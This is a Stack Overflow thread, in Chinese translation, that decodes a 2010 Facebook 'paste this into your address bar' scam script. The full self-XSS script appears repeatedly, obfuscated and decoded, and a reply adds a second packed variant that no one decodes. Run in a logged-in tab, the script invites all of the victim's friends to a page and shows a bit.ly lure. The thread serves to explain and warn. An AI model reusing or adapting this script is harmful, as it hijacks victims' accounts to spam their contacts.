
我在Facebook上收到一條消息,要求我將其複製並粘貼到我的地址欄中。我想我會在這裏發佈,看看大家對它的看法。它有什麼作用?它是如何工作的?地址欄中的Javascript - 是否是惡意的?

源代碼如下:

// (DO NOT DO THIS!) 
// Obfuscated "paste this into your address bar" scam script. The `Javascript:` prefix
// turns the whole line into a javascript: URL, so pasting it into the address bar of a
// logged-in Facebook tab runs it with the victim's own session (the pattern usually
// called self-XSS). Every string is written as \xNN escapes purely to hide the method
// and element names from a casual reader; decoded, the table is
// a[0]="innerHTML", a[1]="app4949752878_app4949752878_dd", a[2]="getElementById",
// a[3]=the injected "Suggest to Friends" <a> tag, a[4]="suggest", a[5]="MouseEvents",
// a[6]="createEvent", a[7]="click", a[8]="initEvent", a[9]="dispatchEvent",
// a[10]="select_all", a[11]="sgm_invite_form", a[12]="/ajax/social_graph/invite_dialog.php",
// a[13]="submitDialog". Nothing here is a browser exploit: it only drives the page's own
// UI, which is exactly why the browser cannot block it.
// `void (...)` around each statement discards the expression's value; a javascript: URL
// that evaluates to a string would otherwise make the browser display that string.
Javascript:var a=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x32\x36\x38\x32\x36\x39\x35\x34\x31\x38\x35\x32\x33\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"]; 
// Step 1: replace the contents of element a[1] with the "Suggest to Friends" link (a[3]),
// whose ajaxify attribute targets the invite dialog for node_id=112682695418523
// (presumably the scammer's own page), then grab the injected link by its id "suggest".
void (document[a[2]](a[1])[a[0]]=a[3]);var ss=document[a[2]](a[4]); 
// Step 2: build a synthetic click (legacy createEvent/initEvent API; bubbles and
// cancelable both true) and dispatch it on the injected link so Facebook's own
// handler opens the invite dialog.
var c=document[a[6]](a[5]); 
c[a[8]](a[7],true,true); 
void (ss[a[9]](c)); 
// Step 3 (after 4 s, giving the dialog time to load): fs.select_all() — `fs` is not
// defined in this script; presumably Facebook's friend-selector object on the page.
void (setTimeout(function(){fs[a[10]]();} ,4000)); 
// Step 4 (after 5 s): SocialGraphManager.submitDialog("sgm_invite_form",
// "/ajax/social_graph/invite_dialog.php") — submits the invite form through the page's
// own code, presumably sending the invitation to every friend selected in step 3.
void (setTimeout(function(){SocialGraphManager[a[13]](a[11],a[12]);} ,5000)); 
// Step 5 (after 5.4 s): overwrite the element with
// "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>" — a follow-on lure;
// where the short link leads cannot be told from this code.
void (setTimeout(function(){ 
document[a[2]](a[1])[a[0]]="\x3C\x61\x20\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x62\x54\x6C\x30\x76\x6A\x27\x3E\x43\x6F\x6D\x70\x6C\x65\x74\x65\x64\x21\x20\x43\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E"; 
} ,5400)); 

看起來合法:) – ChaosPandion 2010-04-14 00:38:34


它是做什麼的? – David 2010-04-14 00:39:33


可能重複[Javascript編譯或不?檢查裏面....](http://stackoverflow.com/questions/2613986/javascript-compiled-or-not-check-inside) – meagar 2010-05-13 13:33:53

回答


以下是格式化後的源代碼:

// The same scam script with the \xNN escapes decoded. `a` is a lookup table of every
// identifier and literal the script uses, so e.g. `document[a[2]](a[1])` reads as
// document.getElementById("app4949752878_app4949752878_dd").
var a = ["innerHTML", // a[0]
     "app4949752878_app4949752878_dd", // a[1]: id of the page element whose contents get replaced
     "getElementById", // a[2]
     "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>", // a[3]: injected link; ajaxify targets the invite dialog for node_id=112682695418523
     "suggest", // a[4]
     "MouseEvents", // a[5]
     "createEvent", // a[6]
     "click", // a[7]
     "initEvent", // a[8]
     "dispatchEvent", // a[9]
     "select_all", // a[10]
     "sgm_invite_form", // a[11]
     "/ajax/social_graph/invite_dialog.php", // a[12]
     "submitDialog"]; // a[13]

// Inject the "Suggest to Friends" link and fetch it back by its id.
void (document[a[2]](a[1])[a[0]] = a[3]); 
var ss = document[a[2]](a[4]); 
// Synthetic click (legacy createEvent/initEvent API) on the injected link, so the
// page's own handler opens the invite dialog.
var c = document[a[6]](a[5]); 
c[a[8]](a[7], true, true); 
void ss[a[9]](c); 
// After 4 s: fs.select_all() — `fs` is not defined here; presumably Facebook's
// friend-selector object on the page.
void setTimeout(function() {fs[a[10]]();}, 4000); 
// After 5 s: SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php").
void setTimeout(function() {SocialGraphManager[a[13]](a[11], a[12]);}, 5000); 
// After 5.4 s: swap the injected link for a "Completed!" lure pointing at a bit.ly short link.
void setTimeout(function() {document[a[2]](a[1])[a[0]] = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";}, 5400); 

`a` 陣列保存了代碼用到的所有字符串。
以下是把這些字符串放回原位後的代碼:

// The scam script with the string table inlined. Because it is pasted into the address
// bar of a logged-in Facebook tab, it runs with the victim's own session and only drives
// the page's existing UI — no browser vulnerability is involved.
// Step 1: inject a "Suggest to Friends" link whose ajaxify attribute targets the invite
// dialog for node_id=112682695418523 (presumably the scammer's own page).
void (document.getElementById('app4949752878_app4949752878_dd').innerHTML = "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>"); 
// Step 2: synthetic click on the injected link (legacy createEvent/initEvent API;
// bubbles and cancelable both true) so Facebook's own handler opens the invite dialog.
var ss = document.getElementById("suggest"); 
var c = document.createEvent("MouseEvents"); 
c.initEvent("click", true, true); 
void ss.dispatchEvent(c); 
// Step 3 (after 4 s, giving the dialog time to load): `fs` is not defined in this
// script; presumably Facebook's friend-selector object, whose select_all ticks every friend.
void setTimeout(function() {fs.select_all();}, 4000); 
// Step 4 (after 5 s): submit the invite form through the page's own SocialGraphManager,
// presumably sending the invitation to everyone selected in step 3.
void setTimeout(function() { 
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php"); 
}, 5000); 
// Step 5 (after 5.4 s): replace the link with a "Completed!" lure pointing at a bit.ly
// short link; where it redirects cannot be told from this code.
void setTimeout(function() { 
    document.getElementById('app4949752878_app4949752878_dd').innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>"; 
}, 5400); 

最後,以下是使用合理命名和結構的版本:

// Readable rendering of the "paste this into your address bar" scam script. Run from
// the address bar of a logged-in Facebook tab it executes with the victim's own session
// and simply automates clicks the user could make by hand — which is why no browser
// protection stops it. Timings are hard-coded guesses at how long each dialog takes to load.
var messageElement = document.getElementById('app4949752878_app4949752878_dd'); 

// Step 1: inject a "Suggest to Friends" link whose ajaxify attribute targets the invite
// dialog for node_id=112682695418523 (presumably the scammer's own page).
messageElement.innerHTML = 
    "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>"; 

// Step 2: synthesise a click on the injected link (legacy createEvent/initEvent API;
// bubbles and cancelable both true) so Facebook's own handler opens the invite dialog.
var suggestLink = document.getElementById("suggest"); 
var mouseEvent = document.createEvent("MouseEvents"); 
mouseEvent.initEvent("click", true, true); 
suggestLink.dispatchEvent(mouseEvent); 


// Step 3 (after 4 s): `fs` is not defined in this script — presumably Facebook's
// friend-selector object on the page; select_all ticks every friend in the dialog.
setTimeout(function() { fs.select_all(); }, 4000); 
// Step 4 (after 5 s): submit the invite form through the page's own SocialGraphManager,
// presumably sending the invitation to everyone selected in step 3.
setTimeout(function() { 
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php"); 
}, 5000); 
// Step 5 (after 5.4 s): replace the link with a "Completed!" lure pointing at a bit.ly
// short link; where it redirects cannot be told from this code.
setTimeout(function() { 
    messageElement.innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>"; 
}, 5400); 

謝謝,這很有幫助。不過它到底做了什麼? – David 2010-04-14 00:40:36


請稍候,我正在翻譯它。 – SLaks 2010-04-14 00:41:09


當然。感謝你這樣做。 – David 2010-04-14 00:41:27


我總覺得這類東西很有趣,因爲它展示了人們用來繞過安全機制、或誘使他人做蠢事的各種手法。

我的「黃金法則」是:這類東西總是非常可疑,最好直接忽略。沒有任何正當的功能需要這種黑客手段;往好了說它也多半違反了網站的使用策略,最壞的情況則是你的賬號被盜、你的電腦或網絡身份被濫用,或者你的銀行賬戶被掏空。


非常有趣。你是怎麼解碼它的?

我剛收到了類似的東西,但看起來不是同一類型。下面是部分代碼(後半部分)。我不確定是否應該把整段代碼貼出來。我是新手。

(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();